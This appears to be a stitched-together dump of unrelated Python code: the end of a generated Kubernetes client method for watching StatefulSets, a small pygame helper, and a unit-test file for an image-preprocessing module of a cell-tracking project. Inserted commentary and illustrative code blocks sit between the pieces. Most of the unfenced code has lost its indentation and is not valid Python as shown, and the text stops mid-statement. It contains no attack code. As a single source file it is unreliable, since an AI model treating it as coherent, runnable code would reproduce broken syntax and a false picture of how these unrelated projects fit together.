"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.watch_apps_v1alpha1_stateful_set_list_for_all_namespaces_with_http_info(**kwargs)
else:
(data) = self.watch_apps_v1alpha1_stateful_set_list_for_all_namespaces_with_http_info(**kwargs)
return data
def watch_apps_v1alpha1_stateful_set_list_for_all_namespaces_with_http_info(self, **kwargs):
"""
watch individual changes to a list of StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_apps_v1alpha1_stateful_set_list_for_all_namespaces_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['field_selector', 'label_selector', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_apps_v1alpha1_stateful_set_list_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/watch/statefulsets'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VersionedEvent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
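Every `*_with_http_info` method above rejects unknown keyword arguments before building the request, using the same `all_params` loop. That check can be isolated into a small helper; this is an illustrative sketch (the `validate_kwargs` name is ours, not part of the generated client):

```python
def validate_kwargs(method_name, all_params, kwargs):
    """Raise TypeError for any kwarg not in the method's allowed set."""
    # The generated code always also accepts these two internal kwargs
    allowed = set(all_params) | {'callback', '_return_http_data_only'}
    for key in kwargs:
        if key not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method %s" % (key, method_name)
            )


# Known parameters pass silently; a typo such as 'namspace' is rejected
validate_kwargs('read_stateful_set', ['name', 'namespace', 'pretty'],
                {'pretty': 'true'})
try:
    validate_kwargs('read_stateful_set', ['name', 'namespace', 'pretty'],
                    {'namspace': 'default'})
    caught = None
except TypeError as err:
    caught = str(err)
```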
# utils.py from davidarias/py-shooting-game (Beerware license)
import pygame
import random
def random_position(start, stop):
    return (random.randint(start, stop), random.randint(start, stop))
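As a quick illustrative check (the function is repeated here so the snippet runs standalone), `random_position` draws each coordinate independently from the same inclusive range, so the result always lies inside the `[start, stop] x [start, stop]` square:

```python
import random

def random_position(start, stop):
    # Each axis is sampled independently; randint bounds are inclusive
    return (random.randint(start, stop), random.randint(start, stop))

pos = random_position(0, 100)
```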
#!/usr/bin/env python3
# tests/model/test_preproc.py from JackToppen/deep-hipsc-tracking (BSD-3-Clause license)
# Imports
# Standard lib
import unittest
import pathlib
# 3rd party
import numpy as np
from PIL import Image
# Our own imports
from deep_hipsc_tracking.model import preproc
from deep_hipsc_tracking.model._preproc import composite_mask
from .. import helpers
# Helper Classes
class FakeDetector(object):
""" Mock a classic one output detector """
def __init__(self, predict=None):
if predict is None:
self.predict = self.predict_ones
else:
self.predict = predict
def predict_ones(self, batch_slab, batch_size):
return np.ones((batch_size, 1), dtype=np.float32)
class FakeConvDetector(object):
""" Mock a convolutional detector """
def __init__(self, in_shape, out_shape):
self.in_shape = in_shape
self.out_shape = out_shape
self.start_x = (in_shape[0] - out_shape[0])//2
self.start_y = (in_shape[1] - out_shape[1])//2
self.end_x = self.start_x + out_shape[0]
self.end_y = self.start_y + out_shape[1]
def predict(self, batch_slab):
assert batch_slab.ndim == 4
assert batch_slab.shape[1:3] == self.in_shape
return batch_slab[:, self.start_x:self.end_x, self.start_y:self.end_y, 0:1]
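The convolutional mock above stands in for a model whose output tile is a centered crop of its input tile. This standalone sketch (the name `CenterCropDetector` is illustrative, mirroring `FakeConvDetector`) confirms the crop arithmetic for the U-Net-like 256-in / 68-out shape used in the tests below:

```python
import numpy as np

class CenterCropDetector:
    """Fake model whose 'prediction' is the center crop of each input tile."""

    def __init__(self, in_shape, out_shape):
        # Offset of the output window inside the input window.
        self.start_x = (in_shape[0] - out_shape[0]) // 2
        self.start_y = (in_shape[1] - out_shape[1]) // 2
        self.end_x = self.start_x + out_shape[0]
        self.end_y = self.start_y + out_shape[1]

    def predict(self, batch):
        # batch is (n, rows, cols, channels); return the center crop, 1 channel.
        return batch[:, self.start_x:self.end_x, self.start_y:self.end_y, 0:1]

det = CenterCropDetector((256, 256), (68, 68))
out = det.predict(np.zeros((2, 256, 256, 3)))
assert out.shape == (2, 68, 68, 1)  # (256 - 68) // 2 = 94, so rows 94:162
```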
# Tests
class TestPredictWithSteps(unittest.TestCase):
def test_predicts_same_size_input_output(self):
        img = np.random.random_sample((256, 256))
detector = FakeConvDetector((256, 256), (256, 256))
res = preproc.predict_with_steps(img, detector, (256, 256), (256, 256))
self.assertEqual(res.shape, (256, 256))
np.testing.assert_almost_equal(res, img)
def test_predicts_one_off_input_output(self):
        img = np.random.random_sample((257, 257))
detector = FakeConvDetector((256, 256), (256, 256))
res = preproc.predict_with_steps(img, detector, (256, 256), (256, 256))
self.assertEqual(res.shape, (257, 257))
np.testing.assert_almost_equal(res, img)
def test_predicts_input_output_all_different(self):
        img = np.random.random_sample((257, 257))
detector = FakeConvDetector((256, 256), (225, 225))
res = preproc.predict_with_steps(img, detector, (256, 256), (225, 225))
self.assertEqual(res.shape, (257, 257))
np.testing.assert_almost_equal(res, img)
def test_predicts_input_output_countception_shape(self):
        img = np.random.random_sample((260, 347))
detector = FakeConvDetector((256, 256), (225, 225))
res = preproc.predict_with_steps(img, detector, (256, 256), (225, 225))
self.assertEqual(res.shape, (260, 347))
np.testing.assert_almost_equal(res, img)
def test_predicts_input_output_unet_shape(self):
        img = np.random.random_sample((260, 347))
detector = FakeConvDetector((256, 256), (68, 68))
res = preproc.predict_with_steps(img, detector, (256, 256), (68, 68))
self.assertEqual(res.shape, (260, 347))
np.testing.assert_almost_equal(res, img)
def test_predicts_input_output_with_small_overlap(self):
        img = np.random.random_sample((260, 347))
detector = FakeConvDetector((256, 256), (68, 68))
res = preproc.predict_with_steps(img, detector, (256, 256), (68, 68), overlap=1)
self.assertEqual(res.shape, (260, 347))
np.testing.assert_almost_equal(res, img)
def test_predicts_input_output_with_large_overlap(self):
        img = np.random.random_sample((260, 347))
detector = FakeConvDetector((256, 256), (68, 68))
res = preproc.predict_with_steps(img, detector, (256, 256), (68, 68), overlap=(10, 8))
self.assertEqual(res.shape, (260, 347))
np.testing.assert_almost_equal(res, img)
class TestCalculatePeakImage(unittest.TestCase):
def test_peaks_with_single_dot_equal_padding(self):
target_img = np.zeros((64, 64))
target_img[32, 32] = 1
x = np.arange(64) - 32
y = np.arange(64) - 32
xx, yy = np.meshgrid(x, y)
rr = np.sqrt(xx**2 + yy**2)
exp_img = (1 - rr/4)
exp_img[exp_img < 0] = 0
peak_img = preproc.calculate_peak_image(target_img,
img_rows=32, img_cols=32,
zero_padding=32,
peak_sharpness=8)
self.assertEqual(peak_img.shape, target_img.shape)
np.testing.assert_almost_equal(exp_img, peak_img)
class TestRandomSplit(unittest.TestCase):
def test_without_replacement(self):
ind = np.random.rand(16)
ind.sort()
samp, rem = preproc.random_split(ind, 8)
self.assertEqual(samp.shape, (8, ))
self.assertEqual(rem.shape, (8, ))
res = np.concatenate((samp, rem))
res.sort()
np.testing.assert_almost_equal(res, ind)
def test_without_replacement_too_many_samples(self):
ind = np.random.rand(16)
ind.sort()
samp, rem = preproc.random_split(ind, 20)
self.assertEqual(samp.shape, (16, ))
self.assertEqual(rem.shape, (0, ))
res = np.concatenate((samp, rem))
res.sort()
np.testing.assert_almost_equal(res, ind)
def test_with_replacement(self):
ind = np.random.rand(16)
ind.sort()
samp, rem = preproc.random_split(ind, 8, with_replacement=True)
self.assertEqual(samp.shape, (8, ))
self.assertEqual(rem.shape, (16, ))
np.testing.assert_almost_equal(ind, rem)
        self.assertTrue(all(s in ind for s in samp))
def test_with_replacement_too_many_samples(self):
ind = np.random.rand(16)
ind.sort()
samp, rem = preproc.random_split(ind, 20, with_replacement=True)
self.assertEqual(samp.shape, (20, ))
self.assertEqual(rem.shape, (16, ))
np.testing.assert_almost_equal(ind, rem)
        self.assertTrue(all(s in ind for s in samp))
class TestCompositeMask(unittest.TestCase):
def test_composite_one_sample_mean(self):
srows, scols = 16, 16
img = np.random.rand(16, 16, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
mode='mean')
exp = np.ones((16, 16))
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_full_field_mean(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
mode='mean')
exp = np.ones((32, 32))
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_full_field_mean_small_batches(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
batch_size=2,
mode='mean')
exp = np.ones((32, 32))
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
batch_size=3,
mode='mean')
exp = np.ones((32, 32))
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_full_field_mean_strided(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=5,
batch_size=2,
mode='mean')
exp = np.ones((32, 32))
exp[:, -1] = np.nan
exp[-1, :] = np.nan
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_full_field_mean_masked(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
        mask = np.zeros((32, 32), dtype=bool)
mask[:4, :4] = 1
mask[-4:, -4:] = 1
detector = FakeDetector()
res = composite_mask(img, detector,
mask=mask,
srows=srows, scols=scols,
batch_stride=5,
batch_size=2,
mode='mean')
exp = np.ones((32, 32))
exp[:, -1] = np.nan
exp[-1, :] = np.nan
exp[~mask] = np.nan
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_one_field_peaks(self):
srows, scols = 16, 16
img = np.random.rand(16, 16, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
mode='peak')
exp = np.full((16, 16), np.nan)
exp[8, 8] = 1
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_full_field_peaks(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
mode='peaks')
exp = np.full((32, 32), np.nan)
exp[8:25, 8:25] = 1
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_full_field_peaks_rotations(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
mode='peaks',
transforms='rotations')
exp0 = np.full((32, 32), np.nan)
exp0[8:25, 8:25] = 1
exp1 = np.full((32, 32), np.nan)
exp1[8:25, 7:24] = 1
exp2 = np.full((32, 32), np.nan)
exp2[7:24, 7:24] = 1
exp3 = np.full((32, 32), np.nan)
exp3[7:24, 8:25] = 1
exp = [exp0, exp1, exp2, exp3]
self.assertEqual(len(res), len(exp))
for r, e in zip(res, exp):
np.testing.assert_almost_equal(r, e)
def test_composite_full_field_peaks_small_batches(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
batch_size=2,
mode='peaks')
exp = np.full((32, 32), np.nan)
exp[8:25, 8:25] = 1
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
batch_size=3,
mode='peaks')
exp = np.full((32, 32), np.nan)
exp[8:25, 8:25] = 1
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_full_field_peaks_strided(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=5,
batch_size=2,
mode='peaks')
exp = np.full((32, 32), np.nan)
exp[6:26, 6:26] = 1
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=5,
batch_size=3,
mode='peaks')
exp = np.full((32, 32), np.nan)
exp[6:26, 6:26] = 1
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
class TestCompleteSampler(unittest.TestCase):
def test_samples_upper_corner(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.CompleteSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
sampler.current_index = 0
sampler.current_slice = 0
out_img = sampler.slice_next(1, img)
self.assertEqual(sampler.current_index, 0)
self.assertEqual(sampler.current_slice, 1)
self.assertEqual(out_img.shape, (1, 64, 96, 3))
np.testing.assert_almost_equal(out_img[0, ...], img[:64, :96, :])
out_img = sampler.slice_next(1, img)
self.assertEqual(sampler.current_index, 0)
self.assertEqual(sampler.current_slice, 2)
self.assertEqual(out_img.shape, (1, 64, 96, 3))
np.testing.assert_almost_equal(out_img[0, ...], img[:64, 1:97, :])
def test_samples_over_whole_image(self):
img = np.random.rand(100, 100, 3)
sampler = preproc.CompleteSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
sampler.current_index = 0
sampler.current_slice = 0
out_img = sampler.slice_next(185, img)
self.assertEqual(sampler.current_index, 1)
self.assertEqual(sampler.current_slice, 0)
self.assertEqual(out_img.shape, (185, 64, 96, 3))
for i in range(37):
for j in range(5):
idx = i * 5 + j
np.testing.assert_almost_equal(out_img[idx, ...],
img[i:i+64, j:j+96, :])
def test_samples_over_whole_image_color_to_gray(self):
img = np.random.rand(100, 100, 3)
img_gray = np.mean(img, axis=2)[..., np.newaxis]
sampler = preproc.CompleteSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 1),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
sampler.current_index = 0
sampler.current_slice = 0
out_img = sampler.slice_next(185, img)
self.assertEqual(sampler.current_index, 1)
self.assertEqual(sampler.current_slice, 0)
self.assertEqual(out_img.shape, (185, 64, 96, 1))
for i in range(37):
for j in range(5):
idx = i * 5 + j
np.testing.assert_almost_equal(out_img[idx, ...],
img_gray[i:i+64, j:j+96, :])
def test_samples_as_much_as_it_can(self):
img = np.random.rand(100, 100, 3)
sampler = preproc.CompleteSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
sampler.current_index = 0
sampler.current_slice = 0
out_img = sampler.slice_next(187, img)
self.assertEqual(sampler.current_index, 1)
self.assertEqual(sampler.current_slice, 0)
self.assertEqual(out_img.shape, (185, 64, 96, 3))
for i in range(37):
for j in range(5):
idx = i * 5 + j
np.testing.assert_almost_equal(out_img[idx, ...],
img[i:i+64, j:j+96, :])
def test_samples_as_much_as_it_can_with_an_offset(self):
img = np.random.rand(100, 100, 3)
sampler = preproc.CompleteSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
sampler.current_index = 0
sampler.current_slice = 5
out_img = sampler.slice_next(187, img)
self.assertEqual(sampler.current_index, 1)
self.assertEqual(sampler.current_slice, 0)
self.assertEqual(out_img.shape, (180, 64, 96, 3))
for i in range(37):
for j in range(5):
idx = i * 5 + j - 5
if idx < 0:
continue
np.testing.assert_almost_equal(out_img[idx, ...],
img[i:i+64, j:j+96, :])
def test_samples_multiple_whole_images(self):
img1 = np.random.rand(100, 100, 3)
img2 = np.random.rand(100, 100, 3)
sampler = preproc.CompleteSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
sampler.current_index = 0
sampler.current_slice = 0
out_img1, out_img2 = sampler.slice_next(185, img1, img2)
self.assertEqual(sampler.current_index, 1)
self.assertEqual(sampler.current_slice, 0)
self.assertEqual(out_img1.shape, (185, 64, 96, 3))
self.assertEqual(out_img2.shape, (185, 64, 96, 3))
for i in range(37):
for j in range(5):
idx = i * 5 + j
np.testing.assert_almost_equal(out_img1[idx, ...],
img1[i:i+64, j:j+96, :])
np.testing.assert_almost_equal(out_img2[idx, ...],
img2[i:i+64, j:j+96, :])
def test_resample_all_over_several_images(self):
img1 = np.random.rand(100, 100, 3)
img2 = np.random.rand(110, 110, 3)
class FakeCompleteSampler(preproc.CompleteSampler):
def load_file(self, filename):
if filename.name == '001.jpg':
return img1
elif filename.name == '003.jpg':
return img2
else:
return None
sampler = FakeCompleteSampler(files=['001.jpg', '002.jpg', '003.jpg'],
image_layout='tensorflow',
batch_size=1024,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_all(1024)
self.assertEqual(out_img.shape, (1024, 64, 96, 3))
self.assertEqual(sampler.current_slice, 134)
self.assertEqual(sampler.current_index, 0)
for i in range(37):
for j in range(5):
idx = i * 5 + j
np.testing.assert_almost_equal(out_img[idx, ...],
img1[i:i+64, j:j+96, :])
for i in range(47):
for j in range(15):
idx = i * 15 + j + 185
np.testing.assert_almost_equal(out_img[idx, ...],
img2[i:i+64, j:j+96, :])
for i in range(37):
for j in range(5):
idx = i * 5 + j + 890
if idx >= 1024:
break
np.testing.assert_almost_equal(out_img[idx, ...],
img1[i:i+64, j:j+96, :])
def test_resample_all_over_several_images_with_masks(self):
img1 = np.random.rand(100, 100, 3)
img2 = np.random.rand(110, 110, 3)
mask1 = np.random.rand(100, 100, 1)
mask2 = np.random.rand(110, 110, 1)
class FakeCompleteSampler(preproc.CompleteSampler):
def load_file(self, filename):
if filename.name == '001.jpg':
return img1
elif filename.name == '003.jpg':
return img2
else:
return None
def load_mask(self, filename, img):
if filename.name == '001.jpg':
return mask1
elif filename.name == '003.jpg':
return mask2
else:
return None
sampler = FakeCompleteSampler(files=['001.jpg', '002.jpg', '003.jpg'],
masks=['001.npz', '002.npz', '003.npz'],
image_layout='tensorflow',
batch_size=1024,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img, out_mask = sampler.resample_all(1024)
self.assertEqual(out_img.shape, (1024, 64, 96, 3))
self.assertEqual(out_mask.shape, (1024, 64, 96, 1))
self.assertEqual(sampler.current_slice, 134)
self.assertEqual(sampler.current_index, 0)
for i in range(37):
for j in range(5):
idx = i * 5 + j
np.testing.assert_almost_equal(out_img[idx, ...],
img1[i:i+64, j:j+96, :])
np.testing.assert_almost_equal(out_mask[idx, ...],
mask1[i:i+64, j:j+96, :])
for i in range(47):
for j in range(15):
idx = i * 15 + j + 185
np.testing.assert_almost_equal(out_img[idx, ...],
img2[i:i+64, j:j+96, :])
np.testing.assert_almost_equal(out_mask[idx, ...],
mask2[i:i+64, j:j+96, :])
for i in range(37):
for j in range(5):
idx = i * 5 + j + 890
if idx >= 1024:
break
np.testing.assert_almost_equal(out_img[idx, ...],
img1[i:i+64, j:j+96, :])
np.testing.assert_almost_equal(out_mask[idx, ...],
mask1[i:i+64, j:j+96, :])
class TestRandomSampler(unittest.TestCase):
def test_load_mask(self):
img = np.random.rand(300, 300, 3)
masks = {
'foo': [
[0.0, 0.0, 0.4, 0.5],
[0.9, 0.9, 1.0, 1.0],
],
}
sampler = preproc.RandomSampler(files=[],
masks=masks,
image_layout='theano',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_mask = sampler.load_mask(pathlib.Path('grr/foo.jpg'), img)
self.assertEqual(out_mask.shape, (300, 300, 1))
        exp_mask = np.zeros((300, 300, 1), dtype=bool)
exp_mask[150:, :120, :] = True
exp_mask[:30, 270:, :] = True
np.testing.assert_almost_equal(exp_mask, out_mask)
def test_resample_image_theano(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='theano',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_image(img)
self.assertEqual(out_img.shape, (3, 96, 64))
def test_resample_image_tensorflow(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_image(img)
self.assertEqual(out_img.shape, (64, 96, 3))
def test_resample_image_tensorflow_color_to_gray(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 1),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_image(img)
self.assertEqual(out_img.shape, (64, 96, 1))
def test_can_resample_with_fixed_params_no_change(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(300, 300, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_image(
img, size=300, theta=0, shift=[0, 0],
flip_horizontal=False)
exp_img = img
np.testing.assert_almost_equal(exp_img, out_img, decimal=4)
def test_can_resample_with_fixed_params_zero_pad_no_change(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(300, 300, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
zero_padding=10,
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_image(
img, size=300, theta=0, shift=[10, 10],
flip_horizontal=False)
exp_img = img
np.testing.assert_almost_equal(exp_img, out_img, decimal=4)
def test_can_resample_with_fixed_params_shifts_flips(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(200, 200, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
flip_vertical=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_image(
img, size=200, theta=0, shift=[10, 10],
flip_horizontal=True, flip_vertical=True)
exp_img = img[10:-90, 10:-90, :]
exp_img = exp_img[::-1, ::-1, :]
np.testing.assert_almost_equal(exp_img, out_img, decimal=4)
def test_can_resample_with_fixed_params_only_resize(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_image(
img, size=300, theta=0, shift=[0, 0],
flip_horizontal=False)
exp_img = preproc.resample_in_box(
img, 300, np.eye(2), np.array([[150.0], [150.0]]),
input_shape=(64, 96, 3))
np.testing.assert_almost_equal(exp_img, out_img)
def test_can_resample_multiple_images_with_same_transform(self):
img1 = np.random.rand(300, 300, 3)
img2 = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(200, 200, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img1, out_img2 = sampler.resample_image(
img1, img2, size=200, theta=0, shift=[10, 10],
flip_horizontal=True)
exp_img1 = img1[10:-90, 10:-90, :]
exp_img1 = exp_img1[:, ::-1, :]
np.testing.assert_almost_equal(exp_img1, out_img1, decimal=4)
exp_img2 = img2[10:-90, 10:-90, :]
exp_img2 = exp_img2[:, ::-1, :]
np.testing.assert_almost_equal(exp_img2, out_img2, decimal=4)
def test_can_resample_multiple_images_with_same_transform_padding(self):
img1 = np.random.rand(300, 300, 3)
img2 = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(200, 200, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None,
zero_padding=5)
out_img1, out_img2 = sampler.resample_image(
img1, img2, size=200, theta=0, shift=[10, 10],
flip_horizontal=True)
exp_img1 = img1[5:205, 5:205, :]
exp_img1 = exp_img1[:, ::-1, :]
np.testing.assert_almost_equal(exp_img1, out_img1, decimal=4)
exp_img2 = img2[5:205, 5:205, :]
exp_img2 = exp_img2[:, ::-1, :]
np.testing.assert_almost_equal(exp_img2, out_img2, decimal=4)
def test_can_resample_multiple_images_random_transform(self):
img1 = np.random.rand(300, 300, 3)
img2 = img1.copy()
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(200, 200, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
flip_vertical=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img1, out_img2 = sampler.resample_image(
img1, img2)
np.testing.assert_almost_equal(out_img1, out_img2, decimal=4)
def test_can_resample_mask_with_image_same_transform(self):
img1 = np.random.rand(300, 300, 3)
        img2 = np.zeros((300, 300), dtype=bool)
img2[10:-90, 10:-90] = False
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(200, 200, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img1, out_img2 = sampler.resample_image(
img1, img2, size=200, theta=0, shift=[10, 10],
flip_horizontal=True)
exp_img1 = img1[10:-90, 10:-90, :]
exp_img1 = exp_img1[:, ::-1, :]
np.testing.assert_almost_equal(exp_img1, out_img1, decimal=4)
exp_img2 = img2[10:-90, 10:-90]
exp_img2 = exp_img2[:, ::-1]
np.testing.assert_almost_equal(exp_img2, out_img2, decimal=4)
self.assertTrue(np.all(exp_img2 == 0))
class TestResampleInBox(unittest.TestCase):
def test_resample_grayscale_2d(self):
img = np.random.random((512, 512, 3))
img = np.mean(img, axis=2)
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
out_img = preproc.resample_in_box(
img, scale, rot, shift, input_shape=256)
self.assertEqual(out_img.shape, (256, 256))
def test_resample_grayscale_3d(self):
img = np.random.random((512, 512, 3))
img = np.mean(img, axis=2)
img = img[:, :, np.newaxis]
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
out_img = preproc.resample_in_box(
img, scale, rot, shift, input_shape=256)
self.assertEqual(out_img.shape, (256, 256, 1))
def test_resample_grayscale_3d_colors(self):
img = np.random.random((512, 512, 3))
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
out_img = preproc.resample_in_box(
